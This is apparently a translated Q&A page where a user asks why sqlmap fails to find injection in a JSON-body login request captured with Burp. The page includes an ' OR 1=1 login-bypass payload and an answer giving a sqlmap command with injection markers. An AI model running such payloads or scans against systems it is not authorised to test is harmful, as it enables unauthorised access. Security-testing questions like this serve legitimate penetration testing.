SQLMAP - 将JSON数据作为正文发布
您好我试图以登录表单进行SQL注入。
使用BurpSuite我拦截了请求:
POST /xxxx/web/Login HTTP/1.1
Host: 10.0.0.70:42020
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:49.0) Gecko/20100101 Firefox/49.0
Accept: application/json, text/plain, */*
Accept-Language: it-IT,it;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/json
Referer: http://xxxxxx.com/xxxxxx/
Content-Length: 44
origin: http://xxxxx.com
Connection: close
{"username”:"user",”password”:"pass"}
使用:
sqlmap -u requestFile
(其中requestFile是截获Burp的请求的内容)
sqlmap无法找到密码的可注入字段。
如果我输入了密码,我确定它是可注射的原因:
' OR 1=1; -- -
我可以使用我插入的每个用户名登录
也试过:
{"username”:*,”password”:*}
但没有运气。
我做错了什么?
2 个答案:
答案 0 :(得分:2)
示例:
POST / HTTP/1.1
Host: www.example.com
{"username":"*", "password":"*"}
另存为 sqlrequest.txt
然后可以使用此命令启动测试:
py sqlmap.py -r sqlrequest.txt --level=5 risk=3 --force-ssl
然后您应该会收到一个提示,提示您找到了自定义注入标记,并且在 POST 正文中找到了 JSON 数据。处理这两个,然后你就可以开始了。
来源:
答案 1 :(得分:-2)
相关问题
最新问题
- 我写了这段代码,但我无法理解我的错误
- 我无法从一个代码实例的列表中删除 None 值,但我可以在另一个实例中。为什么它适用于一个细分市场而不适用于另一个细分市场?
- 是否有可能使 loadstring 不可能等于打印?卢阿
- java中的random.expovariate()
- Appscript 通过会议在 Google 日历中发送电子邮件和创建活动
- 为什么我的 Onclick 箭头功能在 React 中不起作用?
- 在此代码中是否有使用“this”的替代方法?
- 在 SQL Server 和 PostgreSQL 上查询,我如何从第一个表获得第二个表的可视化
- 每千个数字得到
- 更新了城市边界 KML 文件的来源?